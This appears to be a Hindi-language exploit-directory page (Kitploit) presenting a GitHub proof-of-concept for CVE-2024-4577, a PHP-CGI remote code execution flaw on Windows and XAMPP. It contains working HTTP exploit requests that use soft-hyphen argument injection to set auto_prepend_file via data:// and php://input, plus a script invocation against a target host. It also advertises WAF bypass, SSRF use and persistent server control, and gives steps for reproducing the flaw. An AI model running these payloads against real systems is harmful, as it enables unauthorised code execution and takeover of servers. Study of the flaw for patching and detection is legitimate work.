Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-4577-PHP-RCE — [भेद्यता पुनरुत्पादन] PHP डिफ़ॉल्ट वातावरण (XAMPP) का उपयोग करने वाला दुनिया का पहला CVE-2024-4577 PHP-CGI RCE भेद्यता का EXP। | Kitploit
उपकरण/GitHubGitHub/xcanwin/cve-2024-4577-php-rce
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणWAF बाईपासपेनिट्रेशन टेस्टिंगपेलोड डेवलपमेंट
GitHubxcanwin/cve-2024-4577-php-rce

CVE-2024-4577-PHP-RCE

[भेद्यता पुनरुत्पादन] PHP डिफ़ॉल्ट वातावरण (XAMPP) का उपयोग करने वाला दुनिया का पहला CVE-2024-4577 PHP-CGI RCE भेद्यता का EXP।

रिपॉजिटरी देखें
162332 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2024-4577-PHP-RCE

परियोजना परिचय और सिद्धांत

  • दुनिया का पहला PHP डिफ़ॉल्ट वातावरण (XAMPP) का उपयोग करने वाला CVE-2024-4577 PHP-CGI RCE शोषण (EXP).
  • दुनिया का पहला CVE-2024-4577 PHP-CGI RCE शोषण जो डिफ़ॉल्ट PHP वातावरण का उपयोग करता है. मूल शोषण साझा करना, SSRF का समर्थन करता है, WAF बाईपास का समर्थन करता है.
  • PHP डिफ़ॉल्ट वातावरण में RCE प्राप्त करें. सिद्धांत: cgi.force_redirect + REDIRECT-STATUS.
  • नया मूल EXP जोड़ा गया, WAF बाईपास परिदृश्य के लिए समर्थन. सिद्धांत: FastCGI सर्वर स्थापित करना + FastCGI प्रोटोकॉल संचार.
  • नया मूल EXP जोड़ा गया, SSRF परिदृश्य के लिए समर्थन. सिद्धांत: data:// प्रोटोकॉल + GET अनुरोध.

EXP 1 के लाभ

  • allow_url_include, auto_prepend_file, auto_append_file की आवश्यकता के बिना RCE. कोई भी फ़ाइल और php फ़ाइल शामिल कर सकते हैं.
  • WAF द्वारा अक्सर ब्लॉक किए जाने वाले कीवर्ड allow_url_include, auto_prepend_file, auto_append_file दिखाई नहीं देंगे.
  • FastCGI सर्वर का सारा संचार WAF द्वारा लॉग नहीं किया जाएगा.
  • नए पोर्ट पर सुनना, इस प्रकार apache और php से स्वतंत्र, php सर्वर का स्थायी नियंत्रण प्राप्त करना.

भेद्यता परिचय

जानकारीसामग्री
भेद्यता नामPHP RCE
भेद्यता संख्याCVE-2024-4577
जोखिम स्तरउच्च जोखिम
भेद्यता प्रकारRCE

प्रभावित संस्करण

  • PHP Windows संस्करण 8.3.0 <= प्रभावित संस्करण < 8.3.8
  • PHP Windows संस्करण 8.2.0 <= प्रभावित संस्करण < 8.2.20
  • PHP Windows संस्करण 8.1.0 <= प्रभावित संस्करण < 8.1.29
  • PHP Windows संस्करण प्रभावित संस्करण == 8.0.x
  • PHP Windows संस्करण प्रभावित संस्करण == 7.x
  • PHP Windows संस्करण प्रभावित संस्करण == 5.x
  • XAMPP Windows संस्करण 8.2.0 <= प्रभावित संस्करण <= 8.2.12
  • XAMPP Windows संस्करण 8.1.0 <= प्रभावित संस्करण <= 8.1.25
  • XAMPP Windows संस्करण प्रभावित संस्करण == 8.0.x
  • XAMPP Windows संस्करण प्रभावित संस्करण == 7.x
  • XAMPP Windows संस्करण प्रभावित संस्करण == 5.x

EXP 1

WAF बाईपास परिदृश्य + डिफ़ॉल्ट परिदृश्य के लिए उपयोग करें:

root@kitploit:~
python CVE-2024-4577-PHP-RCE.py PhpServerHost:PhpServerPort

उदाहरण:

root@kitploit:~
python CVE-2024-4577-PHP-RCE.py 123.123.123.123:80

EXP 2

SSRF परिदृश्य + डिफ़ॉल्ट परिदृश्य के लिए उपयोग करें:

root@kitploit:~
http://PhpServerHost:PhpServerPort/php-cgi/php-cgi.exe?%add+cgi.force_redirect%3dXCANWIN+-d+allow_url_include%3d1+-d+auto_prepend_file%3d"data:XCANWIN/XCANWIN;base64,PD9waHAgZGllKCJUZSIuInNUIik7Pz4g"

EXP 3

डिफ़ॉल्ट परिदृश्य के लिए उपयोग करें:

root@kitploit:~
POST /php-cgi/php-cgi.exe?%add+cgi.force_redirect%3dXCANWIN+%add+allow_url_include%3don+%add+auto_prepend_file%3dphp%3a//input HTTP/1.1
Host: PhpServerHost

<?php die("Te"."sT");?>

EXP 4

डिफ़ॉल्ट परिदृश्य के लिए उपयोग करें:

root@kitploit:~
POST /php-cgi/php-cgi.exe?%add+allow_url_include%3don+%add+auto_prepend_file%3dphp%3a//input HTTP/1.1
Host: PhpServerHost
REDIRECT-STATUS: XCANWIN

<?php die("Te"."sT");?>

पुनरुत्पादन

  1. सर्वर वातावरण:
root@kitploit:~
XAMPP Windows संस्करण 8.2.12
  1. सर्वर डाउनलोड करें और XAMPP स्थापित करें:
root@kitploit:~
https://zenlayer.dl.sourceforge.net/project/xampp/XAMPP%20Windows/8.2.12/xampp-windows-x64-8.2.12-0-VS16-installer.exe?viasf=1

या आप स्वयं यहां प्रभावित संस्करण चुन सकते हैं: https://sourceforge.net/projects/xampp/files/XAMPP%20Windows/
  1. सर्वर कॉन्फ़िगरेशन
root@kitploit:~
कोई संशोधन आवश्यक नहीं, डिफ़ॉल्ट कॉन्फ़िगरेशन रखें
  1. क्लाइंट द्वारा EXP का उपयोग
root@kitploit:~
उपरोक्त EXP का उपयोग करके परीक्षण करें
  1. सत्यापन
root@kitploit:~
जांचें कि क्या स्ट्रिंग "TesT" या सर्वर की system.ini फ़ाइल सामग्री वापस आती है
टूल डाउनलोड करें
शोषण कठिनाईकम